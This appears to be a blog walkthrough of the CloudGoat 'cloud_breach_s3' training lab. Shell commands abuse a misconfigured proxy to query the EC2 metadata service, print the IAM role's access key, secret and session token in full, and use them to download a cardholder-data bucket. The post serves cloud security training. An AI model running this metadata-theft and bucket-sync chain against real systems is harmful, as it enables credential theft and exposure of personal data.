[Offensive security] Let’s steal the confidential files from the misconfigured S3 bucket.

What we will do in this article

1: setup an initial environment using Docker

overview

1: setup an initial environment using Docker

Scenario: cloud_breach_s3

The IP Address of an EC2 server that is running a misconfigured reverse proxy

Scenario Goal

Download the confidential files from the S3 bucket.

What we know now

cloudgoat_output_aws_account_id = "362364726861"
cloudgoat_output_target_ec2_server_ip = "54.166.247.74"

DEMO

curl http://54.166.247.74
<h1>This server is configured to proxy requests to the EC2 metadata service. Please modify your request's 'host' header and try again.</h1>bash-5.1#
bash-5.1# curl http://54.166.247.74 -H 'Host:169.254.169.254'
1.0
2007-01-19
2007-03-01
2007-08-29
2007-10-10
2007-12-15
2008-02-01
2008-09-01
2009-04-04
2011-01-01
2011-05-01
2012-01-12
2014-02-25
2014-11-05
2015-10-20
2016-04-19
2016-06-30
2016-09-02
2018-03-28
2018-08-17
2018-09-24
2019-10-01
2020-10-27
2021-01-03
2021-03-23
2021-07-15
bash-5.1# curl http://54.166.247.74/latest/meta-data/iam/security-credentials/ -H 'Host:169.254.169.254'
cg-banking-WAF-Role-cgid3qq26zlbnkbash-5.1#
bash-5.1# curl http://54.166.247.74/latest/meta-data/iam/security-credentials/cg-banking-WAF-Role-cgid3qq26zlbnk -H 'Host:169.254.169.254'{
"Code" : "Success",
"LastUpdated" : "2022-01-17T20:26:57Z",
"Type" : "AWS-HMAC",
"AccessKeyId" : "ASIAVIXU65ZGWME5OYV3",
"SecretAccessKey" : "FBONy6v+wJatW3akJodEX3D1I1txstAlnLIJbdCd",
"Token" : "IQoJb3JpZ2luX2VjEK3//////////wEaCXVzLWVhc3QtMSJHMEUCIETZRIuKV4k3FwBtOljx7ZkO/wbgub6zFDlCVlRpyJRqAiEAxJe9zYCizyRgWe7k++V2Sd08P8/LzngysPfzVtdQLJAqgwQIxv//////////ARAAGgwzNjIzNjQ3MjY4NjEiDKaDQQ5lh/+OwODvcSrXA8xo7tQ/5AMDZg/2LO6Y0DFsz87CW50rOXdwAE4Iv1wuCIAvw7ejWOP4FUdPLdaBiF9/MJqALVsyPnj1pdkF0aCUNmNqbq04PWVtvCf7nSm0/AzrdgWinHkqzuMbmr9LViZ38oR7foZGLsD1A795vF6SUF6RdKYE7/4FeeQa8BWNaRGIt5EqViOjpeJdt7Z8lUqeUjhsrW8asrdOA38E9x59x9M1yU+BSqwkcObNnKdTZ8wMkG//axps1t6E5knyeDaRCKavNS8Zt2omNrvMWSKxS6tYKoMhwP/+cNeW8qdg2pRH3Ye5Zls0w2Rj9K7Fb8hYRSmxcSxlozlEidxP06HmfCOf57i6i1+S7g0pQ8lig2h/iULPsiW2RgyJtMmSg3epPXhxCPw0S9IKKJ9LRIeeiNh9BkD5rImXLjNuz2Sa5Ycs1Hq0+wimoNf3vOktWwO2L+R40+Utms6/C25fMhOn4ZiNeJryNO8tZIpb5kGxr1pLPpKI2eZIhkT7ElVIkGP9ZQiAE6Xmv/qSXDLso4aQU9DLWjUkgulGytZM9dQJ9n3OF6ZOTR/SR7g1aM5ia5qVeCVnLloQfrGL7lI3m9LXu4EL7YCT0FixosFzHXxp3m77u3MEBzC0opePBjqlAeQ/2FiLQQMAOJTEZXY7+lVgCIiC45GQY/s4roJ8ZcBT23r56YtyQGSufICoj9fxIQNlDkk/ASRcRGXgjtB2v5qk35jV220kb3X7ub+leexre8/euiXzEy/4hpIueQHnFgROK6x9ox8Ihy3XAuf+63ybQFAZseAHHQ+7ZVPqedyyERNWvwEHvCw6jDImd9jQXXMkFXHVCiZEXYmqL93Oju5Tf8sAxQ==",
"Expiration" : "2022-01-18T03:02:32Z"
}bash-5.1#
bash-5.1# aws configure --profile hackerAWS Access Key ID [None]: ASIAVIXU65ZGWME5OYV3
AWS Secret Access Key [None]: FBONy6v+wJatW3akJodEX3D1I1txstAlnLIJbdCd
Default region name [None]:
Default output format [None]:
bash-5.1# vi ~/.aws/credentialsaws_session_token = IQoJb3JpZ2luX2VjEK3//////////wEaCXVzLWVhc3QtMSJHMEUCIETZRIuKV4k3FwBtOljx7ZkO/wbgub6zFDlCVlRpyJRqAiEAxJe9zYCizyRgWe7k++V2Sd08P8/LzngysPfzVtdQLJAqgwQIxv//////////ARAAGgwzNjIzNjQ3MjY4NjEiDKaDQQ5lh/+OwODvcSrXA8xo7tQ/5AMDZg/2LO6Y0DFsz87CW50rOXdwAE4Iv1wuCIAvw7ejWOP4FUdPLdaBiF9/MJqALVsyPnj1pdkF0aCUNmNqbq04PWVtvCf7nSm0/AzrdgWinHkqzuMbmr9LViZ38oR7foZGLsD1A795vF6SUF6RdKYE7/4FeeQa8BWNaRGIt5EqViOjpeJdt7Z8lUqeUjhsrW8asrdOA38E9x59x9M1yU+BSqwkcObNnKdTZ8wMkG//axps1t6E5knyeDaRCKavNS8Zt2omNrvMWSKxS6tYKoMhwP/+cNeW8qdg2pRH3Ye5Zls0w2Rj9K7Fb8hYRSmxcSxlozlEidxP06HmfCOf57i6i1+S7g0pQ8lig2h/iULPsiW2RgyJtMmSg3epPXhxCPw0S9IKKJ9LRIeeiNh9BkD5rImXLjNuz2Sa5Ycs1Hq0+wimoNf3vOktWwO2L+R40+Utms6/C25fMhOn4ZiNeJryNO8tZIpb5kGxr1pLPpKI2eZIhkT7ElVIkGP9ZQiAE6Xmv/qSXDLso4aQU9DLWjUkgulGytZM9dQJ9n3OF6ZOTR/SR7g1aM5ia5qVeCVnLloQfrGL7lI3m9LXu4EL7YCT0FixosFzHXxp3m77u3MEBzC0opePBjqlAeQ/2FiLQQMAOJTEZXY7+lVgCIiC45GQY/s4roJ8ZcBT23r56YtyQGSufICoj9fxIQNlDkk/ASRcRGXgjtB2v5qk35jV220kb3X7ub+leexre8/euiXzEy/4hpIueQHnFgROK6x9ox8Ihy3XAuf+63ybQFAZseAHHQ+7ZVPqedyyERNWvwEHvCw6jDImd9jQXXMkFXHVCiZEXYmqL93Oju5Tf8sAxQ==
bash-5.1# aws s3 ls --profile hacker
2022-01-17 20:26:55 cg-cardholder-data-bucket-cgid3qq26zlbnk
bash-5.1# aws s3 sync s3://cg-cardholder-data-bucket-cgid3qq26zlbnk .  --profile hacker
download: s3://cg-cardholder-data-bucket-cgid3qq26zlbnk/cardholder_data_primary.csv to ./cardholder_data_primary.csv
download: s3://cg-cardholder-data-bucket-cgid3qq26zlbnk/cardholder_data_secondary.csv to ./cardholder_data_secondary.csv
download: s3://cg-cardholder-data-bucket-cgid3qq26zlbnk/cardholders_corporate.csv to ./cardholders_corporate.csv
download: s3://cg-cardholder-data-bucket-cgid3qq26zlbnk/goat.png to ./goat.png
bash-5.1# cat cardholder_data_primary.csv 
ssn,id,first_name,last_name,email,gender,ip_address,address,city,state,zip
287-43-8531,1,Coo

Cleanup

bash-5.1# ./cloudgoat.py destroy cloud_breach_s3

--

--

Cloud security engineer https://www.linkedin.com/in/takahiro-oda-881423197/

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store